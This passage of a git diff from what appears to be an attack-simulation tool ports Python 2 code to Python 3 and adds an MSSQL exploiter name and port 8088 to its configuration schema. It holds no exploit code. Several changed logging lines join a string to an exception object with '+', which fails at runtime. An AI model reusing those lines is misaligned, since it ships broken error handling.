b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -29,7 +29,8 @@ class TelemetryFeed(flask_restful.Resource): try: return \ { - 'telemetries': [TelemetryFeed.get_displayed_telemetry(telem) for telem in telemetries if TelemetryFeed], + 'telemetries': [TelemetryFeed.get_displayed_telemetry(telem) for telem in telemetries + if TelemetryFeed.should_show_brief(telem)], 'timestamp': datetime.now().isoformat() } except KeyError as err: diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py index b5f100bd1..b9a2fd795 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py @@ -12,28 +12,32 @@ logger = logging.getLogger(__name__) class AttackTechnique(object, metaclass=abc.ABCMeta): """ Abstract class for ATT&CK report components """ - @abc.abstractproperty + @property + @abc.abstractmethod def unscanned_msg(self): """ :return: Message that will be displayed in case attack technique was not scanned. """ pass - @abc.abstractproperty + @property + @abc.abstractmethod def scanned_msg(self): """ :return: Message that will be displayed in case attack technique was scanned. """ pass - @abc.abstractproperty + @property + @abc.abstractmethod def used_msg(self): """ :return: Message that will be displayed in case attack technique was used by the scanner. """ pass - @abc.abstractproperty + @property + @abc.abstractmethod def tech_id(self): """ :return: Message that will be displayed in case of attack technique not being scanned. diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index a6759b15b..2d38b6498 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -3,7 +3,6 @@ import collections import functools import logging from jsonschema import Draft4Validator, validators -from six import string_types import monkey_island.cc.services.post_breach_files from monkey_island.cc.database import mongo @@ -236,7 +235,7 @@ class ConfigService: keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS] for key in keys: - if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types): + if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], str): # Check if we are decrypting ssh key pair if flat_config[key] and isinstance(flat_config[key][0], dict) and 'public_key' in flat_config[key][0]: flat_config[key] = [ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key]] @@ -257,7 +256,7 @@ class ConfigService: parent_config_arr = config_arr config_arr = config_arr[config_key_part] - if isinstance(config_arr, collections.Sequence) and not isinstance(config_arr, string_types): + if isinstance(config_arr, collections.Sequence) and not isinstance(config_arr, str): for i in range(len(config_arr)): # Check if array of shh key pairs and then decrypt if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]: diff --git a/monkey/monkey_island/cc/services/config_schema.py b/monkey/monkey_island/cc/services/config_schema.py index e37bac0a3..32ee13b12 100644 --- a/monkey/monkey_island/cc/services/config_schema.py +++ b/monkey/monkey_island/cc/services/config_schema.py @@ -1,4 +1,4 @@ -WARNING_SIGN = " \\u26A0" +WARNING_SIGN = " \u26A0" SCHEMA = { "title": "Monkey", @@ -753,7 +753,8 @@ SCHEMA = { "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", - "VSFTPDExploiter" + "VSFTPDExploiter", + "MSSQLExploiter" ], "description": "Determines which exploits to use. " + WARNING_SIGN @@ -899,7 +900,8 @@ SCHEMA = { 8008, 3306, 9200, - 7001 + 7001, + 8088 ], "description": "List of TCP ports the monkey will check whether they're open" }, diff --git a/monkey/monkey_island/cc/services/edge.py b/monkey/monkey_island/cc/services/edge.py index a2023d4d2..ae3d2a2de 100644 --- a/monkey/monkey_island/cc/services/edge.py +++ b/monkey/monkey_island/cc/services/edge.py @@ -155,7 +155,7 @@ class EdgeService: else: to_label = NodeService.get_node_label(NodeService.get_node_by_id(to_id)) - RIGHT_ARROW = "\\u2192" + RIGHT_ARROW = "\u2192" return "%s %s %s" % (from_label, RIGHT_ARROW, to_label) diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index b01f349d4..0940be503 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -107,10 +107,10 @@ class AWSExporter(Exporter): else: return False except UnknownServiceError as e: - logger.warning('AWS exporter called but AWS-CLI securityhub service is not installed. Error: ' + e.message) + logger.warning('AWS exporter called but AWS-CLI securityhub service is not installed. Error: ' + e) return False except Exception as e: - logger.exception('AWS security hub findings failed to send. Error: ' + e.message) + logger.exception('AWS security hub findings failed to send. Error: ' + e) return False @staticmethod diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py index 0d2b6858d..01be940c4 100644 --- a/monkey/monkey_island/cc/services/reporting/report.py +++ b/monkey/monkey_island/cc/services/reporting/report.py @@ -5,7 +5,6 @@ import logging import ipaddress from bson import json_util from enum import Enum -from six import text_type from common.network.network_range import NetworkRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst @@ -396,7 +395,7 @@ class ReportService: return \ [ - ipaddress.ip_interface(text_type(network['addr'] + '/' + network['netmask'])).network + ipaddress.ip_interface(str(network['addr'] + '/' + network['netmask'])).network for network in network_info['data']['network_info']['networks'] ] @@ -409,7 +408,7 @@ class ReportService: monkey_subnets = ReportService.get_monkey_subnets(monkey['guid']) for subnet in monkey_subnets: for ip in island_ips: - if ipaddress.ip_address(text_type(ip)) in subnet: + if ipaddress.ip_address(str(ip)) in subnet: found_good_ip = True break if found_good_ip: @@ -438,7 +437,7 @@ class ReportService: ip_in_src = None ip_in_dst = None for ip_addr in monkey['ip_addresses']: - if source_subnet_range.is_in_range(text_type(ip_addr)): + if source_subnet_range.is_in_range(str(ip_addr)): ip_in_src = ip_addr break @@ -447,7 +446,7 @@ class ReportService: continue for ip_addr in monkey['ip_addresses']: - if target_subnet_range.is_in_range(text_type(ip_addr)): + if target_subnet_range.is_in_range(str(ip_addr)): ip_in_dst = ip_addr break @@ -483,7 +482,7 @@ class ReportService: scans.rewind() # If we iterated over scans already we need to rewind. for scan in scans: target_ip = scan['data']['machine']['ip_addr'] - if target_subnet_range.is_in_range(text_type(target_ip)): + if target_subnet_range.is_in_range(str(target_ip)): monkey = NodeService.get_monkey_by_guid(scan['monkey_guid']) cross_segment_ip = get_ip_in_src_and_not_in_dst(monkey['ip_addresses'], source_subnet_range, diff --git a/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py b/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py index f308a7933..865556b0d 100644 --- a/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py +++ b/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py @@ -30,4 +30,4 @@ class ReportExporterManager(object, metaclass=Singleton): try: exporter().handle_report(report) except Exception as e: - logger.exception('Failed to export report, error: ' + e.message) + logger.exception('Failed to export report, error: ' + e) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py index 50e60e493..b4efd3c3a 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py @@ -1,5 +1,4 @@ import itertools -from six import text_type from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED from common.network.network_range import NetworkRange @@ -34,8 +33,7 @@ def test_segmentation_violation(current_monkey, target_ip): ) -def is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet): - # type: (Monkey, str, str, str) -> bool +def is_segmentation_violation(current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str) -> bool: """ Checks is a specific communication is a segmentation violation. :param current_monkey: The source monkey which originated the communication. @@ -49,7 +47,7 @@ def is_segmentation_violation(current_monkey, target_ip, source_subnet, target_s source_subnet_range = NetworkRange.get_range_obj(source_subnet) target_subnet_range = NetworkRange.get_range_obj(target_subnet) - if target_subnet_range.is_in_range(text_type(target_ip)): + if target_subnet_range.is_in_range(str(target_ip)): cross_segment_ip = get_ip_in_src_and_not_in_dst( current_monkey.ip_addresses, source_subnet_range,